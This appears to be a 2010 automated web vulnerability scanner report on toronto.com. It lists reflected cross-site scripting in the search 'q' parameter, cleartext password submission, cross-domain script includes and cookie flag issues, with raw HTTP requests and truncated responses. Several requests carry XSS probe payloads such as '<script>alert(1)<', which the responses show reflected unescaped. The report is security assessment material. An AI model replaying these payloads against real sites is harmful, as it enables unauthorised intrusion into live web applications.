1. Cross-site scripting (reflected)
1.1. http://www.toronto.com//searchResults [q parameter]
1.2. http://www.toronto.com//searchResults [q parameter]
1.3. http://www.toronto.com//searchResults [q parameter]
1.4. http://www.toronto.com//searchResults [q parameter]
1.5. http://www.toronto.com//searchResults [q parameter]
1.6. http://www.toronto.com/searchResults [q parameter]
1.7. http://www.toronto.com/searchResults [q parameter]
1.8. http://www.toronto.com/searchResults [q parameter]
1.9. http://www.toronto.com/searchResults [q parameter]
2. Cleartext submission of password
3. Password field with autocomplete enabled
5. Cross-domain Referer leakage
5.1. http://www.toronto.com//searchResults
5.2. http://www.toronto.com/error
5.3. http://www.toronto.com/searchResults
5.4. http://www.toronto.com/searchResults
5.5. http://www.toronto.com/searchResults
5.6. http://www.toronto.com/searchResults
6. Cross-domain script include
6.2. http://www.toronto.com//searchResults
6.3. http://www.toronto.com/error
6.4. http://www.toronto.com/searchResults
6.5. http://www.toronto.com/webapp/RegisterUser
7. Cookie without HttpOnly flag set
7.2. http://www.toronto.com/searchResults
8.2. http://www.toronto.com/error
8.3. http://www.toronto.com/helpers/finder/prototype.lite.js
8.4. http://www.toronto.com/webapp/RegisterUser
9. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | //searchResults |
GET //searchResults?q=''aee2d Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:55:13 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:54:14 GMT X-Varnish: 2021576814 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 44991 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... </script>b581966567a8b7e6"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | //searchResults |
GET //searchResults?q=fcb92</title><script Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:55:31 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:54:32 GMT X-Varnish: 2021579539 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 42606 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <title>Toronto, fcb92</title><script ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | //searchResults |
GET //searchResults?q=''aee2d Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:55:27 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-2 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:54:27 GMT X-Varnish: 2021578857 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 44893 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... </script>b581966567a127d4<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | //searchResults |
GET //searchResults?q=3d536'%3balert(1)/ Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:55:22 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-5 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:54:23 GMT X-Varnish: 2021578148 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 48840 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <span id="ctl00_ContentPla ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | //searchResults |
GET //searchResults?q=9cd23"%3balert(1)/ Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:55:17 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:54:19 GMT X-Varnish: 2021577447 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 47642 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <script> yahooSeachSuggestion("9cd23";alert(1)/ </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /searchResults |
GET /searchResults?q=''85290"><script>alert(1)< Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:49:24 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:48:25 GMT X-Varnish: 2021525755 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 48821 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <meta name="Title" content="Toronto, ''85290"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /searchResults |
GET /searchResults?q=''aee2d</title><script Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:49:39 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:48:40 GMT X-Varnish: 2021528048 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 42884 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <title>Toronto, ''aee2d</title><script ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /searchResults |
GET /searchResults?q=''6ddbb"%3balert(1)/ Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:49:29 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-2 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:48:30 GMT X-Varnish: 2021526360 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 47972 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <script> yahooSeachSuggestion("''6ddbb";alert(1)/ </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /searchResults |
GET /searchResults?q=''9a405'%3balert(1)/ Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:49:33 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-2 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:48:35 GMT X-Varnish: 2021527109 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 49170 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <span id="ctl00_ContentPla ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /webapp/RegisterUser |
GET /webapp/RegisterUser HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.toronto.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.toronto.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Fri, 19 Nov 2010 21:48:24 GMT X-Varnish: 2021525708 2021518857 Age: 46 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 41822 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script language=" ...[SNIP]... <div style="float:left; width:495px; text-align:left; margin-right:15px; word-wrap:break-word;"> <form name="aspnetForm" method="post" action="/webapp <div> ...[SNIP]... <td> <input name="ctl00$ContentP <span id="ctl00_ContentPla ...[SNIP]... <td> <input name="ctl00$ContentP <span id="ctl00_ContentPla ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /webapp/RegisterUser |
GET /webapp/RegisterUser HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.toronto.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.toronto.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Fri, 19 Nov 2010 21:48:24 GMT X-Varnish: 2021525708 2021518857 Age: 46 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 41822 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script language=" ...[SNIP]... <div style="float:left; width:495px; text-align:left; margin-right:15px; word-wrap:break-word;"> <form name="aspnetForm" method="post" action="/webapp <div> ...[SNIP]... <td> <input name="ctl00$ContentP <span id="ctl00_ContentPla ...[SNIP]... <td> <input name="ctl00$ContentP <span id="ctl00_ContentPla ...[SNIP]... |
Severity: | Low |
Confidence: | Tentative |
Host: | http://www.toronto.com |
Path: | /js/JScript.js |
GET /js/JScript.js HTTP/1.1 Accept: */* Referer: http://www.toronto.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.toronto.com Proxy-Connection: Keep-Alive Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Mon, 06 Oct 2008 15:17:08 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-3 X-TOPS-CacheReason: Static cache-control: public, max-age = 86402 Date: Fri, 19 Nov 2010 21:43:17 GMT X-Varnish: 2021479409 2021471343 Age: 51 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 10 Content-Length: 5205 // JScript File function runsearch() { var query = document.getElementById( var searchurl = document.getElementById( va ...[SNIP]... ='+strURL,'sendtofriend' } function openSMSWindow(strUrl { strUrl = strUrl + '&mobile=<%if (Page.User.Identity var intLeftPosition = intLeft; var intTopPosition = intTop; if(intTop == "0" && intLeft == "0") intLeftPosition = (screen.availWidth)? ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | //searchResults |
GET //searchResults?q=''aee2d Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:54:16 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:53:38 GMT X-Varnish: 2021572284 2021568841 Age: 16 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 42884 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <div style="font-size:9px; padding-top:3px; font-weight:normal;"><a href="http://www.thestar ...[SNIP]... <div style="padding-bottom: 2px"> <a href="http://www.toronto <img src="/App_Themes/standard ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... </script> <script language="javascript" src="http://www.google ...[SNIP]... </script> <img src="https://na.decdna width="1" height="1" border="0"> </div> ...[SNIP]... <!-- javascript --> <script type="text/javascript" src="http://eyereact ...[SNIP]... <noscript> <img src="http://toronto.122 ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... </div> <script src="http://s.clicktale ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /error |
GET /error?aspxerrorpath= Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.toronto.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.toronto.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET WS: 2-1 X-TOPS-CacheReason: Speed cache-control: public, max-age = 300 Date: Fri, 19 Nov 2010 21:48:35 GMT X-Varnish: 2021527326 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 5325 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"> < ...[SNIP]... <!-- javascript --> <script type="text/javascript" src="http://eyereact ...[SNIP]... <noscript> <img src="http://toronto.122 ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /searchResults |
GET /searchResults?q=%27 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 22:13:23 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-2 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 22:12:24 GMT X-Varnish: 2021728870 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 43668 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <div style="font-size:9px; padding-top:3px; font-weight:normal;"><a href="http://www.thestar ...[SNIP]... <div style="padding-bottom: 2px"> <a href="http://www.toronto <img src="/App_Themes/standard ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... </script> <script language="javascript" src="http://www.google ...[SNIP]... </script> <img src="https://na.decdna width="1" height="1" border="0"> </div> ...[SNIP]... <!-- javascript --> <script type="text/javascript" src="http://eyereact ...[SNIP]... <noscript> <img src="http://toronto.122 ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... </div> <script src="http://s.clicktale ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /searchResults |
GET /searchResults?q=''aee2d< Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:58:25 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-4 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:57:25 GMT X-Varnish: 2021604316 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: MISS Content-Length: 43129 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <div style="font-size:9px; padding-top:3px; font-weight:normal;"><a href="http://www.thestar ...[SNIP]... <div style="padding-bottom: 2px"> <a href="http://www.toronto <img src="/App_Themes/standard ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... </script> <script language="javascript" src="http://www.google ...[SNIP]... </script> <img src="https://na.decdna width="1" height="1" border="0"> </div> ...[SNIP]... <!-- javascript --> <script type="text/javascript" src="http://eyereact ...[SNIP]... <noscript> <img src="http://toronto.122 ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... </div> <script src="http://s.clicktale ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /searchResults |
GET /searchResults?q='' HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Expires: Fri, 19 Nov 2010 21:46:57 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET WS: 2-3 cache-control: public, max-age = 86400 X-TOPS-CacheReason: TDCsearch Date: Fri, 19 Nov 2010 21:47:41 GMT X-Varnish: 2021519394 2021503551 Age: 103 Via: 1.1 varnish Connection: keep-alive X-Cache-Svr: topsvarnish4 X-Cache: HIT X-Cache-Hits: 1 Content-Length: 47496 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <div style="font-size:9px; padding-top:3px; font-weight:normal;"><a href="http://www.thestar ...[SNIP]... <div style="padding-bottom: 2px"> <a href="http://www.toronto <img src="/App_Themes/standard ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... </script> <a href="http://developer ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... <noscript> <a href="http://adserver ...[SNIP]... </script> <script language="javascript" src="http://www.google ...[SNIP]... </script> <img src="https://na.decdna width="1" height="1" border="0"> </div> ...[SNIP]... <!-- javascript --> <script type="text/javascript" src="http://eyereact ...[SNIP]... <noscript> <img src="http://toronto.122 ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... </div> <script src="http://s.clicktale ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.toronto.com |
Path: | /searchResults |
GET /searchResults?q=''aee2d< Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.toronto.com Cookie: BIGipServerTOPS-WebFarm5 |
